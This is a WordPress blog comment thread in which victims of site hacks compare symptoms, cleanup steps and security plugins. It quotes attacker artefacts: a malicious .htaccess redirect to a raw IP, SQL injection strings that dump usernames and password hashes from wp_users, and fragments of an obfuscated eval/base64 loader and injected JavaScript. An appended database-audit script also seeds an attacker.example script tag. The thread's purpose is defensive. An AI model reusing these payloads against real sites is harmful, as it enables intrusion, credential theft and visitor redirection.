  31. @Summer – looking at the database itself, I have no weird active plugins and checking the options table I have no weird theme stuff. Looking at the database (from phpadmin) I see only one user and it isn’t admin as I changed that userid yesterday. I am still getting weird referrals so there is something somewhere in something. I’m going to check the jpg’s again – maybe an old theme or a non-active theme? Maybe I’ll just wipe the content directory and start from scratch…


  32. Maybe it would be a great idea to have a plugin that can check for these vulnerabilities ? Something that can check against these routines ?

    My knowledge of WP plugins is limited, but feel free to use the idea !

    Paul – BloggingSupport.


  33. @kathy,

    I discovered yesterday that the same 2 IP addresses were bombarding a server of mine, trying to access wp-comments-post.php for a handful of websites using fake referrers from those same websites.

    I knew they were fake because I’d moved those 15-20 domains off that one server and onto another one to prep the old one for a rebuild. The referrers were fake because there was no activity on the real sites matching those hits, and no way the real sites would have referred over to the old server for those calls.

    Maybe what you’re seeing and what I was seeing yesterday was just an attack of comment spams? I’m just wondering if they chose the old IP of those domains, and had it hard-coded into their script because the sites had been previously hacked a few months ago. But yes, I went through the themes again just to be sure, and I didn’t find anything this time.

    The increase in attacks is both annoying and disturbing.


  34. thanks for this article. I unfortunately have suffered from the spam link hack. And like your article discussed, upgrading after the fact is too late. It got me bumped off google for awhile. Thought I had licked it and that is when I discovered that there were still problems.
    Guess I have to dedicate a saturday to following all the advice in this article!


  35. Confirmed: TinyMCE gets hammered on my place, which is running WP 2.5.1. My simple solution: I’ve taken down the whole /wp-includes/js/tinymce/ directory and everything underneath – problem cleanly solved.

    No more issues with that @#$% editor messing up my tags, either: pure win-win.


  36. Thanks for the very informative post…
    Some of the best practices that I follow in order to keep my blog safe (although it’s not really very unsafe, not being very popular) are that I change my password regularly, every month. The passwords I use are very strong, with a combination of upper and lower case, special characters and numbers.
    I update my blog regularly, with the help of the automatic WordPress update plugin; it really is a matter of a few clicks, so I recommend that to everyone.


  37. I recently upgraded my website but before I saw some of the codes posted here. It seems I need to root whatever evil is hiding now inside my blog.

    Thanks for this very informative article.


  38. Wow! Thanks, I wasn’t even aware of the security flaw… I upgraded when 2.5.1 came out, but didn’t realize that it was so potentially threatening. I plan on checking all of my sites to make sure they’re not vulnerable!


  39. Donncha,

    Do you know of any plugins that take a checksum of your particular wordpress install, then notify you if any of your files change.

    Same idea as the Intrusion Detection System you mention, but maybe easier for most users?

    Paul


  40. Paul – there’s this file change plugin that would be useful if you don’t want to run AIDE or Tripwire.

    I wouldn’t run it as often as an hour because the find command could be intensive if your site has lots of files.

    It also won’t find files that have been modified but had the modification time reset by “touch”.

    I’m not aware of a php script that records checksums. That’d be useful, except that hackers could manipulate the data easily.


  41. Thank you! Thank you! Thank you!!!

    I had 2 days of redirects after I made each change in your article (the table prefix was hardest) but it has paid off. By the time I did the very last thing – the table prefix I was finding my site in the google searches anymore.

    It was a LOT of work (since I am clueless when it comes to this stuff) but I got it done. There are two other sites mentioned in the comments – the 9 things and the 10 things lists and those are very helpful also. I also installed a security plugin http://semperfiwebdesign.com/plugins/wp-security-scan/ and a login lockdown plugin http://www.bad-neighborhood.com/(let me look for the links) but couldn’t get the password plugin to work. Fatal errors. (ask apache password protect)


  42. Well luckily for me my blog is new so I haven’t experienced that yet but this is good information to know for the future.


  43. Donncha, Thanks for the write-up but one of the harder parts to fix is the indexing down by Google if your site is compromised. I got nicked by a WordPress flaw and now I spend my time getting things corrected with Google and Yahoo.

    Cheers


  44. Mario, if you have a sitemap and communicate it to Google and Yahoo regularly and properly (there are several plugins that can do that for you, both from a SEO point of view and as a “pure” sitemap generator) the poisoned links should be flushed out within a week or so. Also, I’ve found that the Google, Yahoo and (Windows) Live teams involved in indexing are helpful, when you’re really stuck in the aftermath of a hack attack aimed at poisoning your site with (malicious) links.

    Also, if you have an account with Google, sitemap management with them is a breeze:
    http://google.com/webmasters

    As to Yahoo, you can keep track of your indexed pages with their Site Explorer:
    https://siteexplorer.search.yahoo.com/

    I wholeheartedly recommend Arne Brachhold’s XML Sitemaps plugin, which makes index tracking and management a lot easier: something which is essential in the last step after a (sadly) successful hack attack – the clean-up of the mess.

    Good luck.


  45. Álvaro: Thanks for the reply. My solution was to write my own CMS platform from scratch and delete WordPress and any PHP.

    I do have a python script that dynamically walks the structure of my site and returns a valid sitemap.xml document for Yahoo/Google to parse.

    The sitemaps were submitted 2 weeks ago and have been touched by Googlebot twice in that time.

    The issue is other infected sites that have thousands of links pointing back to me referencing adult or pharmaceutical content that I have since removed. From Google’s Webmaster Dashboard, the “What Googlebot sees” section continues to view my site as adult oriented.


  46. It’s an arms race, and I always feel like I’m playing catch up.

    How reliable is protecting your wp-admin folder with an .htaccess file to limit it to your home IP address?

    If they’re not on my whitelist of IP addresses, is there a way around to access wp-admin?

    Thanks for all of your help


  47. I’m getting an awful lot of hits from bots looking for the following:
    /wp-includes/js/thickbox/\”+urlNoQuery[0]+\”

    Anyone else getting that too? No idea what vulnerability they’re probing, but it just doesn’t feel right, looking at the numbers of requests I’m getting for that resource.


  48. Thanks for the article, I had 5 of my blogs hacked in various ways. All upgraded and repaired now, it was a shock to see how quickly they got it though.


  49. just stumbled across your page. i run this theme too and i can’t stand it haha. You seem to be managing better than me here :)


  50. Excellent advice man, followed it after being referred to this post by Conor from Louder Voice..


  51. That’s why it’s always important to upgrade to the latest version of WordPress when it’s available.

    It can be a hassle, I must admit, but it’s worth it!


  52. Thanks for the extensive explanation, one of my blogs got hacked a couple of weeks ago. Some encoded javascript code was injected into the wp-blog-header.php file. It took me a while to figure out.

  53. Pingback: Osteospermum
  54. Pingback: WordPress PSA

  55. Another easy thing to do is regularly FTP sync from your computer to your host. Set up the FTP software to replace files with whatever is on your computer and to delete everything else. Once a script is setup, all it takes is a click to replace/wipe infected files.

  56. Pingback: Site Upgrade

  57. There is something more over here http://www.bloggerguide.net/blog-platform/wordpress/wordpress-exploit-giving-backlinks-redirects-and-headaches-but-no-visitors/

    If you got attacked, you sure have a user added, called WordPress, visible if you disable javascript in the browser, or visible in the database, with no nicename, created at 00:00:00 0000-00-00.

    In wp_options table, active_plugins you also have the links_cache where are stored the spam links that show up for Googlebot, but not to you.

    Check on http://www.web-sniffer.net on http://www.denisuca.com.
    Googlebot sees: http://web-sniffer.net/?url=http%3A%2F%2Fdenisuca.com%2F&submit=Submit&http=1.1&gzip=yes&type=GET&uak=7

    On Internet Explorer 7 or else you will see: http://web-sniffer.net/?url=http%3A%2F%2Fdenisuca.com%2F&submit=Submit&http=1.1&gzip=yes&type=GET&uak=2

    Googlebot sees the spam links hidden in links_cache.

    The problem is more complex, but it should be stopped.

    There are more locations for their .jpg, .jpgg, .jpeg files. Found some 4 subfolders below in wp-includes tinyMCE.

    And another thing… Attacks were also possible in the latest WordPress stable version.

  58. Pingback: Wordpress hacking

  59. Thanks for this post. I read this about a month ago and wanted to upgrade but my webhost only had the older version available. Too bad cuz now I have been hacked. =(


  60. I have (had) Yahoo for the hosting on my site that got hacked, and they don’t offer anything above WP 2.5 (I should have upgraded via ftp, though).

    Sadly, when my site went down last week, Yahoo refused to put it back up because they said it messed up their server farm. I went and looked at the files and sure enough, somehow the hackers got tons of spammy credit card links into my header – what a nightmare! It’s already cost me over $1000 in losses – too bad we can’t find these jerks and sue them.

    So now I’m in the process of transferring the domain and moving to a different host.


  61. Phew. When I get hold of the slimeball who screwed (more than 10 of) my blogs I will claim diminished responsibility due to rage at being violated. These scumbags cannot be found but if they see my email address then I get my site hosting revoked with no reasons given and no refund. I like justice – shame there ain’t any.

    Thanks for the info – I am hardening as we speak.


  62. Hi
    my site has been hacked
    I found your site using google
    however, i follow your instructions but i am not able to find what you mention in the database
    is it a new hack or what?
    please help
    thanks


  63. Really? Wow, I didn’t know they can hack WordPress that easily and quickly. Well, I’m already updated to the latest version. I’ll check the .htaccess file from time to time in case it was hacked. Thanks for letting us know though.


  64. Hi, this post is simply beyond great. You should write a book on it. One of our sites was hacked, http://www.hornerartworkshop.com; we did a noscript search, found a bugger and deleted it. We also went to Google Webmaster Tools for resubmission. After several weeks it still shows a listing in the search that says the site is dangerous and Firefox tells you to RUN!
    Any suggestions?


  65. I’ve been experiencing periodic hack attempts by the same methods used in what you call the “ekibastos attack”, the latest one being this AM. I’ve kept my WordPress installs upgraded to the latest version available, so whoever this is hasn’t been able to get in, thank goodness.

    I also did a few things to lock down my WP install a bit more, as well as downloading and running the WordPress Exploit Scanner this evening – everything came back clean after the scan. Thanks for writing that plugin!


  66. Thanks for these hack notes! Here’s one I found…

    A few days ago, I was working on one of my blogs, and I happen to notice that the .htaccess file was larger than I remembered. I am talking about file size here . Yeah, I know. It’s not the kind of thing most people notice, but I kinda have a thing for numbers. And yes , I am a geek.

    Anyway… I notice the file size and start thinking, it shouldn’t be that large. So, I download it from my domain to take a peek. Sure enough, some scum bag (bleep) piece of (bleep) hacker type has uploaded a new .htaccess file. Its purpose? To fake people out and sell anti-virus software. That’s it.

    The .htaccess file’s real purpose is to help WordPress display *pretty links* as the URL. It takes the title of the post and adds dashes and uses that as the URL. Great for Google Link Love ! I put a sample of what that looks like for a typical WordPress blog below. You might want to compare yours…

    # BEGIN WordPress
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    # END WordPress

    The modified .htaccess file basically says… if someone is *referred* from Google (or AOL, or Yahoo, etc), then display a little window that says they are being attacked, and then redirect them to the site where they can buy some protection. Piece of (bleep). The sad part is that this technique works on a lot of people. And they used MY site to do it!

    Can you guess what that does to my reputation for first time visitors?

    Here’s the additional code the piece of (bleep) added to my .htaccess file. Again, you might want to review yours and make sure it doesn’t include this.

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
    RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]

    Gotta Respect Google

    The downside to having a popular blog? Google comes by often. This would be a good thing, normally . Except for one little thing. Google came by while the bogus .htaccess file was there! Net result? Google thought I was a malware site and setup a redirect page that basically said I was attacking my visitors. Yeah. Cool, huh?

    But, you have to respect a service like Google that is simply focused on making the surfing experience a better one for their visitors. They included a note to the webmaster on the nasty-gram-page on what to do to clean your site. Google even offered a *review* process to make sure all the fixes took.

    I requested a review at 11am this morning, and by 11pm, my site was back online. Kudos, Google, on having your process down pat and helping *the-little-guy* get back up and running so quickly.

    So, do yourself a favor all you self-hosted bloggers out there … go check your .htaccess file. Make sure it only contains what you expect it to contain. And while you are there, update the permissions to remove the *write* feature. I did.


  67. Hi. These three strings I think were typed into the search box on our blog yesterday morning. The search box is on any of our public pages, though I suppose anyone familiar with wordpress can find it? When checking the plug in Spy, we saw these three things: Can you tell us what they are? Any help would be greatly appreciated.

    ‘)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,0x3a,user_login,0x3a,user_pass,0x3a,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users#

    ?s=�%27%29%29%29%2F**%2FAND%2F**%2FID%3D-1%2F**%2FUNION%2F**%2FSELECT%2F**%2F1%2C2%2C0x3a%2Cuser_login%2C0x3a%2Cuser_pass%2C0x3a%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2F**%2FFROM%2F**%2Fwp_users%23

    eed=rss2&p=11/**/union/**/select/**/concat(0x3a,user_login,0x3a,user_pass,0x3a),2/**/from/**/wp_users/**/where/**/user_id=1/*
    January 11, 2009


  68. Greg – check that your theme properly escapes search strings. Make sure it doesn’t print $s directly; it should use the_search_query()
    Oh, and change the passwords on all your users, just in case.


  69. Hi Doncha. I do not know what I am doing. Can you tell me which file to look in for the code you are talking about? Greatly appreciated. Thanks Greg


  70. Thanks. I checked the server version of the index.php file in the default themes folder, and it has not been modified since two weeks ago, so that should rule it out. I uploaded the one from my local machine to write over it just to be sure. I also reviewed all the modification dates of every non database file on the remote server, and nothing was modified since the search string hack attempt I posted. If you can think of anything else, please let me know. And in any event, thanks for the fast reply and the help. Greg


  71. I just wanted to add that in many cases it’s good to have a second layer of protection that includes the protection of the plugins etc.
    I strongly recommend phpids for this; it’s software for php 5.2.x that protects scripts against almost all sql injections and xss attacks;)
    Regards,
    Malicious


  72. Thanks for the great content! I had to go through my entire database, post by post to find the hidden iframes code the hacker left behind!

    Hopefully now I have resolved the problem. Thanks again.


  73. I am a perfect n00b and my group of blogs were hacked. I was using on them all WordPress 2.7 and I had long passwords like: Uh5″ôD$id?!MS) but it was hacked yesterday and I am still trying to make them work. My hosting company midphase.com helped me to get one of ‘em online and running but the others remain hacked: miautoculiacan.com the content is there and I can enter the admin panel with my password and I am just trying to understand everything. My .htaccess reads like this:
    # -FrontPage-

    IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*

    <Limit GET POST>
    order deny,allow
    deny from all
    allow from all
    </Limit>
    <Limit PUT DELETE>
    order deny,allow
    deny from all
    </Limit>
    AuthName http://www.internetpymes.com
    AuthUserFile /home/intebas7/public_html/_vti_pvt/service.pwd
    AuthGroupFile /home/intebas7/public_html/_vti_pvt/service.grp
    # BEGIN WordPress

    # END WordPress

    Where do I keep looking? Am I in the right direction?

  74. Pingback: Securing Wordpress

  75. Yes, my custom hosted wordpress blog was hacked back in 2007. Talk about heartbreak – I got my first writing job based on that blog!

    I’m tentatively back on the wordpress train but only on wordpress.com which points to my own domain name.


  76. Recently started up a blog and was happy when I started getting listed on google and seeing referrals coming there. Then as quickly as the search results came they disappeared. I noticed googlebot indexing my site last night. Are these fluctuations normal on a new website? I have checked my site for the problems you mention here and it appears to be clean with the latest version of wordpress installed. Thanks for the information and great blog by the way!


  77. Hi, I created a sub folder in my server to test WordPress. It was just 10 days and then some files in that folder are deleted except the wp_content folder, wp_includes folder and wp_register.php… also some of the other folders and files are deleted in the root folder. Will a WordPress hack delete files other than the WordPress files??? Also the files are in read write mode. so :-(


  78. Some great information here, many thanks to all.

    I do try to keep up with the latest versions on all my sites, including plugins, but have to admit that i’m sometimes a bit irregular with my backups.

    Luckily, every time I’ve been hacked (about 30 times across 40 sites in the last 12 months), no damage has been done.

    Thanks again for the tips.


  79. Darn,

    I’ve been hacked with 2.6.5 last year, and just recently with 2.7 on a couple of my sites. It’s extremely annoying, as those were ones on shared hosting packages that don’t let me upgrade automatically. It’s pure laziness on my part that I didn’t do it; all my other sites are 2.7.1 and don’t have a problem.

    Note to self: UPGRADE

    Other Note to self: once you’re done editing theme and plugin files, set file permissions back to 755 for god’s sake!

    Thanks for the article ;-)


  80. Some great information here, many thanks to all.

    I do try to keep up with the latest versions on all my sites, including plugins, but have to admit that i’m sometimes a bit irregular with my backups.

    Luckily, every time I’ve been hacked (about 30 times across 40 sites in the last 12 months), no damage has been done.

    john.


  81. We also got hit :-(

    Our press release section got screwed over by the hacker.

    We did also think about the issue of restoring your permalinks, and the need to do them EXACTLY as they were in the past, to avoid loss of search engine results, and possibly traffic… Most people have easy to remember permalinks, but for people that don’t, and who are silly enough not to have the structure backed up (cough) then here is a guide: http://www.kingpin-seo.co.uk/press-releases/how-to-recover-your-permalinks-settings-to-get-your-indexed-posts-back-dont-loose-google-serps/116611

    Hope you don’t mind me linking to it! – Not trying to spam you guys, just trying to help bloggers avoid SERP loss.


  82. Great info! Thanks for the information. Fortunately, I upgraded before being hacked. However, there are some best practices that I need to update my site with.

    BTW…love the WP-Supercache plugin. Thanks!!!


  83. I may have been hacked, at the very least I had people add themselves as users, never got to the ADMIN point I think, but I did find this in my php code… I use the revolution theme… and am not sure if this should be there or not.

    There doesn’t appear to be anything wrong with the site or pages but here is the code:

    SELECT *
    FROM `DatabasenameXXXXXXXXXXXX`.`wp_options`
    WHERE (
    `option_id` LIKE '%base64_decode%'
    OR `blog_id` LIKE '%base64_decode%'
    OR `option_name` LIKE '%base64_decode%'
    OR `option_value` LIKE '%base64_decode%'
    OR `autoload` LIKE '%base64_decode%'
    )
    LIMIT 0 , 30

    Am I ok.. or did something happen?


  84. Great piece! Looks like I was hacked today! I’ve upgraded to the new WP but the problem I’m having is that when I go to admin – posts – it tells me there are no posts found – but the numeric line above it states that there are posts. My categories are also missing.

    Any suggestions as to where to look? Please help!!!!!!

    Thanks,


  85. Hi there :)) Looking desperatetly for help :) I cannot even get into my blog b/c the worm or whatever has deleted my admin user and now all my posts are gone etc. How do I even get back into my blog to delete the hacker user and start to clean up. Do I do this from FTP? Do I upgrade first? And where exactly do I look for these codes (through my cpanel) or do I go into my blog admin and look at code there? I have a prophoto2 theme blog. Thank you so much. I am worried that the virus will not stop and eat up my whole blog – it is still there for now with header etc, just no posts. Can you please help me?? I’d be so grateful. Thank you :))


  86. My WordPress blog was hacked too; my permalink structure was default but it changed to a funky one when it was hacked by this worm, and a pretty simple fix is to click the default permalink structure again and click save changes. Now your posts should be working again; mine started working again.

    I admit, i had to upgrade my blog for many months, but i am too lazy for some things sometimes, but not anymore, now i got smarter, way smarter to be hacked again.


  87. Thank you for all this useful information. Unfortunately it’s a matter of time until a WordPress blog will be attacked by hackers, in one form or other. The main rule is a constant DB backup. Upgrade your WP and the plugins when it’s possible, try to protect as much as you can; in this article you can find useful details, but don’t forget, secure your important data by regular backups.


  88. For the sake of helping of course, i want to say something else.

    When I was hacked, I mentioned that my permalink structure was hacked; it was literally changed to a very complex one. Fortunately it was not working in terms of real and active links. I guess the hacker who wrote the worm did not want to make damage, real and extensive damage I mean; I guess he wanted only to scare people into upgrading their WordPress blog, which makes me think a lot. I mean, who would want to scare every WordPress blog user into upgrading to the latest patch!!!?

    But the permalink structure hacked was not all, my theme files were hacked too, my footer php file was hacked, they inserted a large number of links to spam stuff, which by the way, really damaged my google search engine position and perhaps even my page rank position too, in the long run of course, and that happened because the guy used a very common flaw everyone does, and wordpress has fault on that, i explain in the next paragraph.

    If you go to the theme editor in the appearance menu, you know or you should know that you can edit your theme files or any other file from your WordPress installation in your WordPress control panel appearance online editor, and for that, you must first chmod the file permissions of the files you want to edit, I mean, change them to be writable so that the online WordPress file editor can edit them. But that is a major flaw because nobody will change the file permissions back again to the value they had, and with an XSS attack or some xmlrpc trackback attack method, hackers could create worms or just pieces of code to insert malware code into the files you just changed permissions on to writable.

    Another flaw people still use in WordPress blogs and others is the XMLRPC protocol, that must be deleted from blogs. It is so insecure that it is just another flaw that hackers use to hack or deface a WordPress blog, so the main patch is for you to delete the xmlrpc.php file from your WordPress root installation directory. Believe me, I really informed myself on this: delete it and deactivate the service by going to the WordPress control panel, then in general options in some menu I can not recall the name, just browse through all and set it off; you do not need that.

    Hope i helped.


  89. Several of my sites were exploited by a hacker recently. As far as I am aware the hack used the WordPress php vulnerability to gain access to my server and rather than creating havoc with WordPress files appears to have defaced one of my html sites by deleting the home page and uploading his or her own stupid home page. So, in this case they used WordPress to gain entry but did not do anything other than deface an unrelated non-WordPress site. Upgraded WordPress, all plugins and installed a firewall which seems to be doing its job of blocking further attacks given the emails I get from them once a week stating I have again fallen victim! Changed all passwords, ftp, admin, sql and any other I could think of! It really is not nice being hacked and is a real pain in the rear, so ensure you back up often and install a firewall – if you have one they will simply move on to another blog which does not, so it’s a good deterrent.


  90. As a JustHost user I installed WordPress (previous version) as first time user, via cPanel – Fantastico.

    Everything worked well, upgraded immediately for WP 2.8.4 security upgrade via WP Dashboard, which subsequently displayed WordPress 2.8.4.

    Henceforth, I thought I was running with WP 2.8.4.

    That is, until yesterday!

    cPanel – Fantastico | WordPress

    displayed in RED upgrade now to WP 2.8.4

    Shock horror!

    Install by Fantastico and it controls WordPress.

    Upgrades by WP WordPress do not update.

    Warning:

    WordPress upgrades – immediate.

    Fantastic WP upgrades – timing delay, therefore, security risk.

    My site been hacked.


  91. My site and blog were also hacked by the latest wordpress worm. It’s important to also look in your sql database, particularly in the wp_users category: if you’re the only admin, there should only be records that pertain to you (tagged with “1″); all others should be deleted. Also check the users meta data: this is where I found a JS file that contained hidden redirect code. Another place is the “uploads” folder: you may find a cached javascript file that shouldn’t be there, or a tinymce.gz file: delete both. Check your blog/database daily after you install a clean copy to make sure it stays clean.


    1. Thank you so much for this article. I’ve recently been hacked with HIDDEN Spam links in my header.
      I did find a bunch of ‘fake’ users in my Users file in myPHPadmin and deleted them.
      Then i changed my WP name/password.
      But the links came back a week later.
      Now i see a bunch of suspicious stuff in my Users Metadata file in myphpadmin.
      ROSACEA:
      How do i know what is safe to delete??
      I feel like I am flying blind.

      Any other tips will be appreciated.


        1. Hi Donncha-
          Thank you SO much for replying to me. So even though I keep deleting these hidden links from my header.php and then re-upload the original header.php and I’ve changed usernames and passwords for both WP and Blue host…the hidden links keep returning!!!

          I’ve also deleted fake users and some odd user metadata.
          Now, i ran your Exploit Plug in and this:
          <?php eval(gzinflate(base64_decode('1VVtT9swEP7c/…
          …plus a bunch of script comes up in what appears to be every plug in.

          It also found so many other things: (eval…display: none;…<iframe)…String.fromCharCode) i don't know what's okay and what is not. I am no expert. Please help. What do i do next? Thank you so much!!
          Lisa
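    An added example, not from the post or any commenter, covering the database checks described in this thread (the hidden “WordPress”/extra admin user with no nicename and a zero registration date, and script injected into user metadata). It builds a constructed in-memory SQLite copy of wp_users and wp_usermeta (an assumption: the real tables live in MySQL, but the queries below use only syntax both accept) and runs the two audits over it; the row values are invented samples and the script URL is a placeholder.

```python
import sqlite3


def build_sample_db():
    """Constructed stand-in for the two WordPress tables (SQLite, in memory)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
    CREATE TABLE wp_users (
        ID INTEGER PRIMARY KEY, user_login TEXT, user_nicename TEXT,
        user_registered TEXT, display_name TEXT);
    CREATE TABLE wp_usermeta (
        umeta_id INTEGER PRIMARY KEY, user_id INTEGER, meta_key TEXT, meta_value TEXT);
    INSERT INTO wp_users VALUES
      (1, 'donncha',   'donncha', '2008-05-01 10:00:00', 'Donncha'),
      (2, 'WordPress', '',        '0000-00-00 00:00:00', 'WordPress'),
      (3, 'reader',    'reader',  '2009-03-03 12:00:00', 'reader');
    INSERT INTO wp_usermeta VALUES
      (1, 1, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'),
      (2, 2, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'),
      (3, 2, 'description',     '<script src="http://attacker.example/x.js"></script>'),
      (4, 3, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}');
    """)
    return db


def suspicious_users(db, legitimate_ids=(1,)):
    """Flag the artefacts commenters describe: accounts with an empty nicename
    or a 0000-00-00 registration date, and any administrator whose ID is not on
    the list of accounts you created yourself."""
    rows = db.execute("""
        SELECT u.ID, u.user_login, u.user_nicename, u.user_registered,
               COALESCE(m.meta_value, '') AS caps
        FROM wp_users u
        LEFT JOIN wp_usermeta m
               ON m.user_id = u.ID AND m.meta_key = 'wp_capabilities'
        ORDER BY u.ID
    """).fetchall()
    flagged = []
    for uid, login, nicename, registered, caps in rows:
        reasons = []
        if nicename == '' or registered.startswith('0000-00-00'):
            reasons.append('empty nicename or zero registration date')
        if 'administrator' in caps and uid not in legitimate_ids:
            reasons.append('unexpected administrator')
        if reasons:
            flagged.append((uid, login, reasons))
    return flagged


def suspicious_usermeta(db):
    """Meta values carrying markup or code; one commenter found a hidden
    redirect stored this way. Returns (umeta_id, user_id, meta_key) tuples."""
    return db.execute("""
        SELECT umeta_id, user_id, meta_key FROM wp_usermeta
        WHERE meta_value LIKE '%<script%' OR meta_value LIKE '%<iframe%'
           OR meta_value LIKE '%eval(%'   OR meta_value LIKE '%base64_decode%'
        ORDER BY umeta_id
    """).fetchall()


if __name__ == "__main__":
    db = build_sample_db()
    print(suspicious_users(db))
    print(suspicious_usermeta(db))
```

    The same two SELECT statements can be pasted into phpMyAdmin against the live database; review the flagged rows before deleting anything, since a legitimate account can also have an odd nicename if it was created by an import.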


  92. Site was hacked yesterday…..
    The code at the bottom of this reply was added to several php files and script.js files.
    I searched through all the files that were added at that time and copied some files from original wordpress installation to make the site work again.
    I hope it is all clean now but know I have to do more to prevent this from happening again.

    I am so annoyed that there are idiots spoiling people’s fun of setting up a website!

    Thanks for the tips mentioned above it helped me getting the site back up and running, but still trying to find better security to prevent this from happening again.

    Any tips are welcome!

    /*GNU GPL*/ try{window.onload = function(){var X08yhffhg7xkxf = document.createElement(‘script’);X08yhffhg7xkxf.setAttribute(‘type’, ‘text/javascript’);X08yhffhg7xkxf.setAttribute(‘id’, ‘myscript1′);X08yhffhg7xkxf…. etcetr you get the point


    1. Thanks, this script is brilliant. Still getting hacked regularly so I haven’t solved the underlying problem but by running your script the site is up most of the time. I am setting up a new site, with all new usernames and passwords.
      Had to reinstall my pc as well because it got infected :-(


  93. My wordpress account was hacked, and I am trying to erase links that have been embedded to my site. I recently upgraded to the latest version of wordpress, changed my passwords, etc. Is there a way to edit my html to delete these embedded links? Here is my website: liisainvermont.com


    1. Ed – didn’t you read the entire article?

      It says upgrade wordpress and check for files that might be corrupt or changed from original. Also check all the folders you set write rights to.

      I would do it with next steps:
      1. backup entire mySql database to local computer
      2. delete mySql database and create new mySql database
      3. restore tables from local backup
      4. check tables for users and change passwords (hacker might have old passwords)
      5. create clean install of latest wordpress
      6. upgrade data in mysql as needed

      Hope this helps…


      1. I’m still not clear on this… if I delete the DB then upload the one I backed up, won’t it contain the fake users still?


  94. Like many I’ve had not only a WordPress site hacked but then my server, and not for the first time. Yes I backup but that’s not the point.

    It’s come to a point where I changed hosts, which took time and money


    1. Mikko – and sometimes the “regular guy” isn’t willing to learn how to administer a website and be responsible for it. Sounds harsh I know but you wouldn’t drive a car without getting some lessons first would you?


  95. Hi Donncha, I don’t know if I’m being hacked or not, but I keep finding a new user in my list of users. They are calling themselves admin, but with no role assigned. He/she/it has made several draft posts. I am using wp2.9.1. Any ideas?


  96. Thanks so much for the advice it came in very handy.

    In my case it was in the header and was one very long line of code that seemed like it was just numbers and would be harmless, but it was the problem.

    It blocked me..

    1. I couldn’t perform from Firefox a simple view source code
    2. Even with “NoScript” on full alert
    3. Every time I would try, it would try to give me a Trojan.
    4. FTPing the header file and attempting to view the local file with notepad also prompted an a/v alert.
    5. I ended up using CPanel’s internal file editor to review the malicious code and remove it.

    Thanks again so much for your help.


  97. Donncha,
    I loved the write-up above and will try it , especially the plugin to see what’s wrong with my site. The site works but the RSS feed http://feeds.feedburner.com/indimag is fried. I get the following :

    Warning: session_start() [function.session-start]: open(/home/39725/data/tmp/sess_a694ffa38088c1954d4fcf657b2f0c54, O_RDWR) failed: Disk quota exceeded (122) in /nfs/c02/h08/mnt/39725/domains/indimag.com/html/wp-content/plugins/wordpress-automatic-upgrade/wordpress-automatic-upgrade.php on line 121

    I would greatly greatly appreciate your/any other commenter’s thoughts on the issue.

    Peace,
    Madhu
    INDIMAG.com


    1. “Disk quota exceeded” – your disk is full.

      Also, it looks like your website is on an NFS drive which is bad for caching. You should cache to a local drive.


      1. Donncha,
        I know of the NFS but to get local it costs and I’m living with it.

        On the disk being full , per the disk usage report I can see I’m using just 2-3 % of my total available disk space — non dedicated , shared , but more than 9 GB free and usage is in MBs only as of now…


        1. My hosting company is just telling using that disk usage report and saying it cannot be the disk, ought to be the plug in ..


  98. Hi Donncha,
    You’ve given really great information here and I will definitely apply it. I only have one problem: can’t even get into the back end of my blog!! Do you have any suggestions?

    When I try to go in with Firefox, my antivirus comes up with the Mal/iframe-f. If I try to go in with IE it doesn’t let me even get near the blog front end or backend.

    once i log in with firefox – everything goes to a white screen and hangs. Had googled and tried to find out what to do but your information is more extensive. do you ever do paid work?

    (coz I am at my wits end and I don’t have enough knowledge of php to know what to delete and what not to)

    I have upgraded, added exploit, have manually looked through files for obvious iframes (didn’t look for the rest of the code you’ve revealed here though).
    have downloaded, scanned for malware with 5 different programs, have deleted users, changed passwords, and stood on my head with this thing !!!

    any advice is appreciated

    Please let me know about the paid thing

    Thanks
    Gaylea


  99. I wanted to mention a couple of plugins that can really help keep your blog protected, especially to all you non-coding webmasters…

    One is called WordPress Firewall. It basically protects your WordPress software from attempts to login, hack passwords or use the query strings to inject code or look for weaknesses. Pros: Closes another door or two in the face of hackers. Cons: Have to ensure your current IP address is listed so you can edit your blog. (Check out whatismyip.com to find it)

    Another is WordPress Antivirus. This basically scans your theme files for injected type code. Though not foolproof, it does add another layer of possible protection.

    I also use WordPress Scanner to scan my installation for security holes.

    Just Google any of these names and the word “wordpress” or “plugin” at the same time.

    And remember, the safety of your blog and your visitors is in your hands… get proactive.


  100. I use WPMU and Love WordPress !! I had 13 sites totaling 4000+ “Real” members, and within a few hours I had 10,000+ fake members all mixed in! And no sites! Most of the fake blogs and user emails I noticed (later) were short first-name-sounding and all had numbers ending that short name, like saally272645343 had matching emails like saally272645343@whateverfake.com
    I also found a theme with files all cute and pretty :{ with images labeled as a lot of the codes you mention above; the theme was named flavour-extended-png in the themes folder. I am almost sure it is infected. Thank you for all the help wordpress world :)

    Keep the Faith :)


  101. Ok First up.

    1. I have 5 wordpress sites all got hacked into during March. The first one http://www.vincecianci.com is reported as an attack site and supposedly has malware on it. The google message appears upon trying to load the site. The same thing has happened on my other sites too.

    2. I can’t access ANY of my sites through the standard wordpress login page, as if my own passwords have been changed.

    3. I am not tech savvy at all. I checked most of my files on each of the 5 wordpress sites and it appears ok to me but what do I know. I have zero php, ftp experience. My hosting provider GoDaddy can’t do anything so I feel I am out of options.

    Any ideas here guys??

    Vince.


  102. The following is a common hack, but I can not seem to find the common fix.

